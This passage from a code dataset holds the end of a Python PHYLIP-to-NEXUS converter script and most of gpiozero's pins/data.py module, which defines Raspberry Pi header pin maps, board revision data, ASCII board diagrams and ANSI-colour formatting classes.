arg = arg_raw.replace(" ","")
arg = arg.strip()
opt = opt.replace("-","")
#print(opt,arg)
if opt in ('p', 'phylip', 'phy'):
self.phylip = arg
elif opt in ('h', 'help'):
pass
elif opt in ('o','out'):
self.out = arg
elif opt in ('n','nohet'):
self.nohet=True
else:
assert False, "Unhandled option %r"%opt
#Check manditory options are set
if not self.phylip:
self.display_help("Error: Missing required phylip file (-p, --phylip)")
def display_help(self, message=None):
if message is not None:
print ("\n",message)
print ("\nphylip2biNumNex.py\n")
print ("Contact:Tyler K. Chafin, University of Arkansas,[email protected]")
print ("\nUsage: ", sys.argv[0], "-p /path/to/phylip \n")
print ("Description: Converts PHYLIP file to NEXUS file of only bi-allelic markers, coded with 012. As inputs for PhyloNetworks MLE_biMarkers or SNAPP")
print("""
Arguments:
	-p,--phylip	: Path to input phylip file
-o,--out : Output file name <default = out.nex>
-n,--nohet : Randomly sample one allele from all heterozygous sites
-h,--help : Displays help menu
""")
sys.exit()
#Call main function
if __name__ == '__main__':
main()
| gpl-3.0 | 3,747,132,566,112,011,300 | 23.558912 | 154 | 0.615451 | false |
MrHarcombe/python-gpiozero | gpiozero/pins/data.py | 1 | 53566 | from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
str = type('')
import os
import sys
from textwrap import dedent
from itertools import cycle
from operator import attrgetter
from collections import namedtuple
from ..exc import PinUnknownPi, PinMultiplePins, PinNoPins, PinInvalidPin
# Some useful constants for describing pins
V1_8 = '1V8'
V3_3 = '3V3'
V5 = '5V'
GND = 'GND'
NC = 'NC' # not connected
GPIO0 = 'GPIO0'
GPIO1 = 'GPIO1'
GPIO2 = 'GPIO2'
GPIO3 = 'GPIO3'
GPIO4 = 'GPIO4'
GPIO5 = 'GPIO5'
GPIO6 = 'GPIO6'
GPIO7 = 'GPIO7'
GPIO8 = 'GPIO8'
GPIO9 = 'GPIO9'
GPIO10 = 'GPIO10'
GPIO11 = 'GPIO11'
GPIO12 = 'GPIO12'
GPIO13 = 'GPIO13'
GPIO14 = 'GPIO14'
GPIO15 = 'GPIO15'
GPIO16 = 'GPIO16'
GPIO17 = 'GPIO17'
GPIO18 = 'GPIO18'
GPIO19 = 'GPIO19'
GPIO20 = 'GPIO20'
GPIO21 = 'GPIO21'
GPIO22 = 'GPIO22'
GPIO23 = 'GPIO23'
GPIO24 = 'GPIO24'
GPIO25 = 'GPIO25'
GPIO26 = 'GPIO26'
GPIO27 = 'GPIO27'
GPIO28 = 'GPIO28'
GPIO29 = 'GPIO29'
GPIO30 = 'GPIO30'
GPIO31 = 'GPIO31'
GPIO32 = 'GPIO32'
GPIO33 = 'GPIO33'
GPIO34 = 'GPIO34'
GPIO35 = 'GPIO35'
GPIO36 = 'GPIO36'
GPIO37 = 'GPIO37'
GPIO38 = 'GPIO38'
GPIO39 = 'GPIO39'
GPIO40 = 'GPIO40'
GPIO41 = 'GPIO41'
GPIO42 = 'GPIO42'
GPIO43 = 'GPIO43'
GPIO44 = 'GPIO44'
GPIO45 = 'GPIO45'
# Board layout ASCII art
REV1_BOARD = """\
{style:white on green}+------------------{style:black on white}| |{style:white on green}--{style:on cyan}| |{style:on green}------+{style:reset}
{style:white on green}| {P1:{style} col2}{style:white on green} P1 {style:black on yellow}|C|{style:white on green} {style:on cyan}|A|{style:on green} |{style:reset}
{style:white on green}| {P1:{style} col1}{style:white on green} {style:black on yellow}+-+{style:white on green} {style:on cyan}+-+{style:on green} |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|SoC|{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:bold}Pi Model{style:normal} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:bold}{model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}|C|{style:black on white}+======{style:reset}
{style:white on green}| {style:on black}|S|{style:black on white}| Net{style:reset}
{style:white on green}| {style:on black}|I|{style:black on white}+======{style:reset}
{style:black on white}=pwr{style:on green} {style:on white}|HDMI|{style:white on green} |{style:reset}
{style:white on green}+----------------{style:black on white}| |{style:white on green}----------+{style:reset}"""
REV2_BOARD = """\
{style:white on green}+------------------{style:black on white}| |{style:white on green}--{style:on cyan}| |{style:on green}------+{style:reset}
{style:white on green}| {P1:{style} col2}{style:white on green} P1 {style:black on yellow}|C|{style:white on green} {style:on cyan}|A|{style:on green} |{style:reset}
{style:white on green}| {P1:{style} col1}{style:white on green} {style:black on yellow}+-+{style:white on green} {style:on cyan}+-+{style:on green} |{style:reset}
{style:white on green}| {P5:{style} col1}{style:white on green} |{style:reset}
{style:white on green}| P5 {P5:{style} col2}{style:white on green} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|SoC|{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:bold}Pi Model{style:normal} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:bold}{model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}|C|{style:black on white}+======{style:reset}
{style:white on green}| {style:on black}|S|{style:black on white}| Net{style:reset}
{style:white on green}| {style:on black}|I|{style:black on white}+======{style:reset}
{style:black on white}=pwr{style:on green} {style:on white}|HDMI|{style:white on green} |{style:reset}
{style:white on green}+----------------{style:black on white}| |{style:white on green}----------+{style:reset}"""
A_BOARD = """\
{style:white on green}+------------------{style:black on white}| |{style:white on green}--{style:on cyan}| |{style:on green}------+{style:reset}
{style:white on green}| {P1:{style} col2}{style:white on green} P1 {style:black on yellow}|C|{style:white on green} {style:on cyan}|A|{style:on green} |{style:reset}
{style:white on green}| {P1:{style} col1}{style:white on green} {style:black on yellow}+-+{style:white on green} {style:on cyan}+-+{style:on green} |{style:reset}
{style:white on green}| {P5:{style} col1}{style:white on green} |{style:reset}
{style:white on green}| P5 {P5:{style} col2}{style:white on green} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|SoC|{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:bold}Pi Model{style:normal} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:bold}{model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}|C|{style:on green} |{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} |{style:reset}
{style:black on white}=pwr{style:on green} {style:on white}|HDMI|{style:white on green} |{style:reset}
{style:white on green}+----------------{style:black on white}| |{style:white on green}----------+{style:reset}"""
BPLUS_BOARD = """\
{style:white on green},--------------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 {style:black on white}+===={style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:black on white}+===={style:reset}
{style:white on green}| {style:bold}Pi Model {model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}+----+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:on black}|SoC |{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:on black}| |{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}+----+{style:on green} |{style:reset}
{style:white on green}| {style:on black}|C|{style:on green} {style:black on white}+======{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:black on white}| Net{style:reset}
{style:white on green}| {style:black on white}pwr{style:white on green} {style:black on white}|HDMI|{style:white on green} {style:on black}|I||A|{style:on green} {style:black on white}+======{style:reset}
{style:white on green}`-{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}----{style:on black}|V|{style:on green}-------'{style:reset}"""
APLUS_BOARD = """\
{style:white on green},--------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 |{style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| {style:bold}Pi Model {model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}+----+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:on black}|SoC |{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:on black}| |{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}+----+{style:on green} |{style:reset}
{style:white on green}| {style:on black}|C|{style:on green} |{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} |{style:reset}
{style:white on green}| {style:black on white}pwr{style:white on green} {style:black on white}|HDMI|{style:white on green} {style:on black}|I||A|{style:on green} |{style:reset}
{style:white on green}`-{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}----{style:on black}|V|{style:on green}-'{style:reset}"""
ZERO12_BOARD = """\
{style:white on green},-------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 |{style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} |{style:reset}
{style:black on white}---+{style:white on green} {style:on black}+---+{style:on green} {style:bold}PiZero{style:normal} |{style:reset}
{style:black on white} sd|{style:white on green} {style:on black}|SoC|{style:on green} {style:bold}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:black on white}---+|hdmi|{style:white on green} {style:on black}+---+{style:on green} {style:black on white}usb{style:on green} {style:black on white}pwr{style:white on green} |{style:reset}
{style:white on green}`---{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}-{style:black on white}| |{style:white on green}-'{style:reset}"""
ZERO13_BOARD = """\
{style:white on green}.-------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 |{style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} {style:black on white}|c{style:reset}
{style:black on white}---+{style:white on green} {style:on black}+---+{style:on green} {style:bold}Pi{model:6s}{style:normal}{style:black on white}|s{style:reset}
{style:black on white} sd|{style:white on green} {style:on black}|SoC|{style:on green} {style:bold}V{pcb_revision:3s}{style:normal} {style:black on white}|i{style:reset}
{style:black on white}---+|hdmi|{style:white on green} {style:on black}+---+{style:on green} {style:black on white}usb{style:on green} {style:on white}pwr{style:white on green} |{style:reset}
{style:white on green}`---{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}-{style:black on white}| |{style:white on green}-'{style:reset}"""
CM_BOARD = """\
{style:white on green}+-----------------------------------------------------------------------------------------------------------------------+{style:reset}
{style:white on green}| Raspberry Pi Compute Module |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| You were expecting more detail? Sorry, the Compute Module's a bit hard to do right now! |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}||||||||||||||||||||-||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||{style:reset}"""
# Pin maps for various board revisions and headers
REV1_P1 = {
# pin func pullup pin func pullup
1: (V3_3, False), 2: (V5, False),
3: (GPIO0, True), 4: (V5, False),
5: (GPIO1, True), 6: (GND, False),
7: (GPIO4, False), 8: (GPIO14, False),
9: (GND, False), 10: (GPIO15, False),
11: (GPIO17, False), 12: (GPIO18, False),
13: (GPIO21, False), 14: (GND, False),
15: (GPIO22, False), 16: (GPIO23, False),
17: (V3_3, False), 18: (GPIO24, False),
19: (GPIO10, False), 20: (GND, False),
21: (GPIO9, False), 22: (GPIO25, False),
23: (GPIO11, False), 24: (GPIO8, False),
25: (GND, False), 26: (GPIO7, False),
}
REV2_P1 = {
1: (V3_3, False), 2: (V5, False),
3: (GPIO2, True), 4: (V5, False),
5: (GPIO3, True), 6: (GND, False),
7: (GPIO4, False), 8: (GPIO14, False),
9: (GND, False), 10: (GPIO15, False),
11: (GPIO17, False), 12: (GPIO18, False),
13: (GPIO27, False), 14: (GND, False),
15: (GPIO22, False), 16: (GPIO23, False),
17: (V3_3, False), 18: (GPIO24, False),
19: (GPIO10, False), 20: (GND, False),
21: (GPIO9, False), 22: (GPIO25, False),
23: (GPIO11, False), 24: (GPIO8, False),
25: (GND, False), 26: (GPIO7, False),
}
REV2_P5 = {
1: (V5, False), 2: (V3_3, False),
3: (GPIO28, False), 4: (GPIO29, False),
5: (GPIO30, False), 6: (GPIO31, False),
7: (GND, False), 8: (GND, False),
}
PLUS_J8 = {
1: (V3_3, False), 2: (V5, False),
3: (GPIO2, True), 4: (V5, False),
5: (GPIO3, True), 6: (GND, False),
7: (GPIO4, False), 8: (GPIO14, False),
9: (GND, False), 10: (GPIO15, False),
11: (GPIO17, False), 12: (GPIO18, False),
13: (GPIO27, False), 14: (GND, False),
15: (GPIO22, False), 16: (GPIO23, False),
17: (V3_3, False), 18: (GPIO24, False),
19: (GPIO10, False), 20: (GND, False),
21: (GPIO9, False), 22: (GPIO25, False),
23: (GPIO11, False), 24: (GPIO8, False),
25: (GND, False), 26: (GPIO7, False),
27: (GPIO0, False), 28: (GPIO1, False),
29: (GPIO5, False), 30: (GND, False),
31: (GPIO6, False), 32: (GPIO12, False),
33: (GPIO13, False), 34: (GND, False),
35: (GPIO19, False), 36: (GPIO16, False),
37: (GPIO26, False), 38: (GPIO20, False),
39: (GND, False), 40: (GPIO21, False),
}
CM_SODIMM = {
1: (GND, False), 2: ('EMMC DISABLE N', False),
3: (GPIO0, False), 4: (NC, False),
5: (GPIO1, False), 6: (NC, False),
7: (GND, False), 8: (NC, False),
9: (GPIO2, False), 10: (NC, False),
11: (GPIO3, False), 12: (NC, False),
13: (GND, False), 14: (NC, False),
15: (GPIO4, False), 16: (NC, False),
17: (GPIO5, False), 18: (NC, False),
19: (GND, False), 20: (NC, False),
21: (GPIO6, False), 22: (NC, False),
23: (GPIO7, False), 24: (NC, False),
25: (GND, False), 26: (GND, False),
27: (GPIO8, False), 28: (GPIO28, False),
29: (GPIO9, False), 30: (GPIO29, False),
31: (GND, False), 32: (GND, False),
33: (GPIO10, False), 34: (GPIO30, False),
35: (GPIO11, False), 36: (GPIO31, False),
37: (GND, False), 38: (GND, False),
39: ('GPIO0-27 VREF', False), 40: ('GPIO0-27 VREF', False),
# Gap in SODIMM pins
41: ('GPIO28-45 VREF', False), 42: ('GPIO28-45 VREF', False),
43: (GND, False), 44: (GND, False),
45: (GPIO12, False), 46: (GPIO32, False),
47: (GPIO13, False), 48: (GPIO33, False),
49: (GND, False), 50: (GND, False),
51: (GPIO14, False), 52: (GPIO34, False),
53: (GPIO15, False), 54: (GPIO35, False),
55: (GND, False), 56: (GND, False),
57: (GPIO16, False), 58: (GPIO36, False),
59: (GPIO17, False), 60: (GPIO37, False),
61: (GND, False), 62: (GND, False),
63: (GPIO18, False), 64: (GPIO38, False),
65: (GPIO19, False), 66: (GPIO39, False),
67: (GND, False), 68: (GND, False),
69: (GPIO20, False), 70: (GPIO40, False),
71: (GPIO21, False), 72: (GPIO41, False),
73: (GND, False), 74: (GND, False),
75: (GPIO22, False), 76: (GPIO42, False),
77: (GPIO23, False), 78: (GPIO43, False),
79: (GND, False), 80: (GND, False),
81: (GPIO24, False), 82: (GPIO44, False),
83: (GPIO25, False), 84: (GPIO45, False),
85: (GND, False), 86: (GND, False),
87: (GPIO26, False), 88: ('GPIO46 1V8', False),
89: (GPIO27, False), 90: ('GPIO47 1V8', False),
91: (GND, False), 92: (GND, False),
93: ('DSI0 DN1', False), 94: ('DSI1 DP0', False),
95: ('DSI0 DP1', False), 96: ('DSI1 DN0', False),
97: (GND, False), 98: (GND, False),
99: ('DSI0 DN0', False), 100: ('DSI1 CP', False),
101: ('DSI0 DP0', False), 102: ('DSI1 CN', False),
103: (GND, False), 104: (GND, False),
105: ('DSI0 CN', False), 106: ('DSI1 DP3', False),
107: ('DSI0 CP', False), 108: ('DSI1 DN3', False),
109: (GND, False), 110: (GND, False),
111: ('HDMI CK N', False), 112: ('DSI1 DP2', False),
113: ('HDMI CK P', False), 114: ('DSI1 DN2', False),
115: (GND, False), 116: (GND, False),
117: ('HDMI D0 N', False), 118: ('DSI1 DP1', False),
119: ('HDMI D0 P', False), 120: ('DSI1 DN1', False),
121: (GND, False), 122: (GND, False),
123: ('HDMI D1 N', False), 124: (NC, False),
125: ('HDMI D1 P', False), 126: (NC, False),
127: (GND, False), 128: (NC, False),
129: ('HDMI D2 N', False), 130: (NC, False),
131: ('HDMI D2 P', False), 132: (NC, False),
133: (GND, False), 134: (GND, False),
135: ('CAM1 DP3', False), 136: ('CAM0 DP0', False),
137: ('CAM1 DN3', False), 138: ('CAM0 DN0', False),
139: (GND, False), 140: (GND, False),
141: ('CAM1 DP2', False), 142: ('CAM0 CP', False),
143: ('CAM1 DN2', False), 144: ('CAM0 CN', False),
145: (GND, False), 146: (GND, False),
147: ('CAM1 CP', False), 148: ('CAM0 DP1', False),
149: ('CAM1 CN', False), 150: ('CAM0 DN1', False),
151: (GND, False), 152: (GND, False),
153: ('CAM1 DP1', False), 154: (NC, False),
155: ('CAM1 DN1', False), 156: (NC, False),
157: (GND, False), 158: (NC, False),
159: ('CAM1 DP0', False), 160: (NC, False),
161: ('CAM1 DN0', False), 162: (NC, False),
163: (GND, False), 164: (GND, False),
165: ('USB DP', False), 166: ('TVDAC', False),
167: ('USB DM', False), 168: ('USB OTGID', False),
169: (GND, False), 170: (GND, False),
171: ('HDMI CEC', False), 172: ('VC TRST N', False),
173: ('HDMI SDA', False), 174: ('VC TDI', False),
175: ('HDMI SCL', False), 176: ('VC TMS', False),
177: ('RUN', False), 178: ('VC TDO', False),
179: ('VDD CORE', False), 180: ('VC TCK', False),
181: (GND, False), 182: (GND, False),
183: (V1_8, False), 184: (V1_8, False),
185: (V1_8, False), 186: (V1_8, False),
187: (GND, False), 188: (GND, False),
189: ('VDAC', False), 190: ('VDAC', False),
191: (V3_3, False), 192: (V3_3, False),
193: (V3_3, False), 194: (V3_3, False),
195: (GND, False), 196: (GND, False),
197: ('VBAT', False), 198: ('VBAT', False),
199: ('VBAT', False), 200: ('VBAT', False),
}
CM3_SODIMM = CM_SODIMM.copy()
CM3_SODIMM.update({
4: ('NC / SDX VREF', False),
6: ('NC / SDX VREF', False),
8: (GND, False),
10: ('NC / SDX CLK', False),
12: ('NC / SDX CMD', False),
14: (GND, False),
16: ('NC / SDX D0', False),
18: ('NC / SDX D1', False),
20: (GND, False),
22: ('NC / SDX D2', False),
24: ('NC / SDX D3', False),
88: ('HDMI HPD N 1V8', False),
90: ('EMMC EN N 1V8', False),
})
# The following data is sourced from a combination of the following locations:
#
# http://elinux.org/RPi_HardwareHistory
# http://elinux.org/RPi_Low-level_peripherals
# https://git.drogon.net/?p=wiringPi;a=blob;f=wiringPi/wiringPi.c#l807
PI_REVISIONS = {
# rev model pcb_rev released soc manufacturer ram storage usb eth wifi bt csi dsi headers board
0x2: ('B', '1.0', '2012Q1', 'BCM2835', 'Egoman', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV1_P1}, REV1_BOARD, ),
0x3: ('B', '1.0', '2012Q3', 'BCM2835', 'Egoman', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV1_P1}, REV1_BOARD, ),
0x4: ('B', '2.0', '2012Q3', 'BCM2835', 'Sony', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x5: ('B', '2.0', '2012Q4', 'BCM2835', 'Qisda', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x6: ('B', '2.0', '2012Q4', 'BCM2835', 'Egoman', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x7: ('A', '2.0', '2013Q1', 'BCM2835', 'Egoman', 256, 'SD', 1, 0, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, A_BOARD, ),
0x8: ('A', '2.0', '2013Q1', 'BCM2835', 'Sony', 256, 'SD', 1, 0, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, A_BOARD, ),
0x9: ('A', '2.0', '2013Q1', 'BCM2835', 'Qisda', 256, 'SD', 1, 0, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, A_BOARD, ),
0xd: ('B', '2.0', '2012Q4', 'BCM2835', 'Egoman', 512, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0xe: ('B', '2.0', '2012Q4', 'BCM2835', 'Sony', 512, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0xf: ('B', '2.0', '2012Q4', 'BCM2835', 'Qisda', 512, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x10: ('B+', '1.2', '2014Q3', 'BCM2835', 'Sony', 512, 'MicroSD', 4, 1, False, False, 1, 1, {'J8': PLUS_J8}, BPLUS_BOARD, ),
0x11: ('CM', '1.1', '2014Q2', 'BCM2835', 'Sony', 512, 'eMMC', 1, 0, False, False, 2, 2, {'SODIMM': CM_SODIMM}, CM_BOARD, ),
0x12: ('A+', '1.1', '2014Q4', 'BCM2835', 'Sony', 256, 'MicroSD', 1, 0, False, False, 1, 1, {'J8': PLUS_J8}, APLUS_BOARD, ),
0x13: ('B+', '1.2', '2015Q1', 'BCM2835', 'Egoman', 512, 'MicroSD', 4, 1, False, False, 1, 1, {'J8': PLUS_J8}, BPLUS_BOARD, ),
0x14: ('CM', '1.1', '2014Q2', 'BCM2835', 'Embest', 512, 'eMMC', 1, 0, False, False, 2, 2, {'SODIMM': CM_SODIMM}, CM_BOARD, ),
0x15: ('A+', '1.1', '2014Q4', 'BCM2835', 'Embest', 256, 'MicroSD', 1, 0, False, False, 1, 1, {'J8': PLUS_J8}, APLUS_BOARD, ),
}
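# Illustrative sketch (not part of the original module): each key of PI_REVISIONS is
# a board revision code mapping to the fields named in the comment above. Revision
# 0x10, for example, describes the model B+ (PCB 1.2) whose 40-pin header is PLUS_J8.
def _example_revision_lookup():
    model, pcb_revision = PI_REVISIONS[0x10][:2]
    headers = PI_REVISIONS[0x10][13]
    return model, pcb_revision, sorted(headers)  # ('B+', '1.2', ['J8'])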
# ANSI color codes, for the pretty printers (nothing comprehensive, just enough
# for our purposes)
class Style(object):
def __init__(self, color=None):
self.color = self._term_supports_color() if color is None else bool(color)
self.effects = {
'reset': 0,
'bold': 1,
'normal': 22,
}
self.colors = {
'black': 0,
'red': 1,
'green': 2,
'yellow': 3,
'blue': 4,
'magenta': 5,
'cyan': 6,
'white': 7,
'default': 9,
}
@staticmethod
def _term_supports_color():
try:
stdout_fd = sys.stdout.fileno()
except IOError:
return False
else:
is_a_tty = os.isatty(stdout_fd)
is_windows = sys.platform.startswith('win')
return is_a_tty and not is_windows
@classmethod
def from_style_content(cls, format_spec):
specs = set(format_spec.split())
style = specs & {'mono', 'color'}
content = specs - style
if len(style) > 1:
raise ValueError('cannot specify both mono and color styles')
try:
style = style.pop()
except KeyError:
style = 'color' if cls._term_supports_color() else 'mono'
if len(content) > 1:
raise ValueError('cannot specify more than one content element')
try:
content = content.pop()
except KeyError:
content = 'full'
return cls(style == 'color'), content
def __call__(self, format_spec):
specs = format_spec.split()
codes = []
fore = True
for spec in specs:
if spec == 'on':
fore = False
else:
try:
codes.append(self.effects[spec])
except KeyError:
try:
if fore:
codes.append(30 + self.colors[spec])
else:
codes.append(40 + self.colors[spec])
except KeyError:
raise ValueError('invalid format specification "%s"' % spec)
if self.color:
return '\x1b[%sm' % (';'.join(str(code) for code in codes))
else:
return ''
def __format__(self, format_spec):
if format_spec == '':
return 'color' if self.color else 'mono'
else:
return self(format_spec)
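# Illustrative sketch (not part of the original module): Style turns simple
# "effect/foreground on background" specifications into ANSI escape sequences,
# or into empty strings when colour output is disabled.
def _example_style_usage():
    style = Style(color=True)                     # force ANSI codes regardless of tty
    assert style('bold red') == '\x1b[1;31m'
    assert style('white on green') == '\x1b[37;42m'
    assert Style(color=False)('bold red') == ''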
class PinInfo(namedtuple('PinInfo', (
'number',
'function',
'pull_up',
'row',
'col',
))):
"""
This class is a :func:`~collections.namedtuple` derivative used to
represent information about a pin present on a GPIO header. The following
attributes are defined:
.. attribute:: number
An integer containing the physical pin number on the header (starting
from 1 in accordance with convention).
.. attribute:: function
A string describing the function of the pin. Some common examples
include "GND" (for pins connecting to ground), "3V3" (for pins which
output 3.3 volts), "GPIO9" (for GPIO9 in the Broadcom numbering
scheme), etc.
.. attribute:: pull_up
A bool indicating whether the pin has a physical pull-up resistor
permanently attached (this is usually ``False`` but GPIO2 and GPIO3
are *usually* ``True``). This is used internally by gpiozero to raise
errors when pull-down is requested on a pin with a physical pull-up
resistor.
.. attribute:: row
An integer indicating on which row the pin is physically located in
the header (1-based)
.. attribute:: col
An integer indicating in which column the pin is physically located
in the header (1-based)
"""
__slots__ = () # workaround python issue #24931
class HeaderInfo(namedtuple('HeaderInfo', (
'name',
'rows',
'columns',
'pins',
))):
"""
This class is a :func:`~collections.namedtuple` derivative used to
represent information about a pin header on a board. The object can be used
in a format string with various custom specifications::
from gpiozero import *
print('{0}'.format(pi_info().headers['J8']))
print('{0:full}'.format(pi_info().headers['J8']))
print('{0:col2}'.format(pi_info().headers['P1']))
print('{0:row1}'.format(pi_info().headers['P1']))
`'color'` and `'mono'` can be prefixed to format specifications to force
the use of `ANSI color codes`_. If neither is specified, ANSI codes will
only be used if stdout is detected to be a tty::
print('{0:color row2}'.format(pi_info().headers['J8'])) # force use of ANSI codes
print('{0:mono row2}'.format(pi_info().headers['P1'])) # force plain ASCII
The following attributes are defined:
.. automethod:: pprint
.. attribute:: name
The name of the header, typically as it appears silk-screened on the
board (e.g. "P1" or "J8").
.. attribute:: rows
The number of rows on the header.
.. attribute:: columns
The number of columns on the header.
.. attribute:: pins
A dictionary mapping physical pin numbers to :class:`PinInfo` tuples.
.. _ANSI color codes: https://en.wikipedia.org/wiki/ANSI_escape_code
"""
__slots__ = () # workaround python issue #24931
def _func_style(self, function, style):
if function == V5:
return style('bold red')
elif function in (V3_3, V1_8):
return style('bold cyan')
elif function in (GND, NC):
return style('bold black')
elif function.startswith('GPIO') and function[4:].isdigit():
return style('bold green')
else:
return style('yellow')
def _format_full(self, style):
Cell = namedtuple('Cell', ('content', 'align', 'style'))
lines = []
for row in range(self.rows):
line = []
for col in range(self.columns):
pin = (row * self.columns) + col + 1
try:
pin = self.pins[pin]
cells = [
Cell(pin.function, '><'[col % 2], self._func_style(pin.function, style)),
Cell('(%d)' % pin.number, '><'[col % 2], ''),
]
if col % 2:
cells = reversed(cells)
line.extend(cells)
except KeyError:
line.append(Cell('', '<', ''))
lines.append(line)
cols = list(zip(*lines))
col_lens = [max(len(cell.content) for cell in col) for col in cols]
lines = [
' '.join(
'{cell.style}{cell.content:{cell.align}{width}s}{style:reset}'.format(
cell=cell, width=width, style=style)
for cell, width, align in zip(line, col_lens, cycle('><')))
for line in lines
]
return '\n'.join(lines)
def _format_pin(self, pin, style):
return ''.join((
style('on black'),
(
' ' if pin is None else
self._func_style(pin.function, style) +
('1' if pin.number == 1 else 'o')
),
style('reset')
))
def _format_row(self, row, style):
if row > self.rows:
raise ValueError('invalid row %d for header %s' % (row, self.name))
start_pin = (row - 1) * self.columns + 1
return ''.join(
self._format_pin(pin, style)
for n in range(start_pin, start_pin + self.columns)
for pin in (self.pins.get(n),)
)
def _format_col(self, col, style):
if col > self.columns:
raise ValueError('invalid col %d for header %s' % (col, self.name))
return ''.join(
self._format_pin(pin, style)
for n in range(col, self.rows * self.columns + 1, self.columns)
for pin in (self.pins.get(n),)
)
def __format__(self, format_spec):
style, content = Style.from_style_content(format_spec)
if content == 'full':
return self._format_full(style)
elif content.startswith('row') and content[3:].isdigit():
return self._format_row(int(content[3:]), style)
        elif content.startswith('col') and content[3:].isdigit():
            return self._format_col(int(content[3:]), style)
        else:
            raise ValueError('invalid format specification "%s"' % format_spec)
def pprint(self, color=None):
"""
Pretty-print a diagram of the header pins.
If *color* is ``None`` (the default, the diagram will include ANSI
color codes if stdout is a color-capable terminal). Otherwise *color*
can be set to ``True`` or ``False`` to force color or monochrome
output.
"""
print('{0:{style} full}'.format(self, style=Style(color)))
class PiBoardInfo(namedtuple('PiBoardInfo', (
'revision',
'model',
'pcb_revision',
'released',
'soc',
'manufacturer',
'memory',
'storage',
'usb',
'ethernet',
'wifi',
'bluetooth',
'csi',
'dsi',
'headers',
'board',
))):
"""
This class is a :func:`~collections.namedtuple` derivative used to
represent information about a particular model of Raspberry Pi. While it is
a tuple, it is strongly recommended that you use the following named
attributes to access the data contained within. The object can be used
in format strings with various custom format specifications::
from gpiozero import *
print('{0}'.format(pi_info()))
print('{0:full}'.format(pi_info()))
print('{0:board}'.format(pi_info()))
print('{0:specs}'.format(pi_info()))
print('{0:headers}'.format(pi_info()))
`'color'` and `'mono'` can be prefixed to format specifications to force
the use of `ANSI color codes`_. If neither is specified, ANSI codes will
only be used if stdout is detected to be a tty::
print('{0:color board}'.format(pi_info())) # force use of ANSI codes
print('{0:mono board}'.format(pi_info())) # force plain ASCII
.. _ANSI color codes: https://en.wikipedia.org/wiki/ANSI_escape_code
.. automethod:: physical_pin
.. automethod:: physical_pins
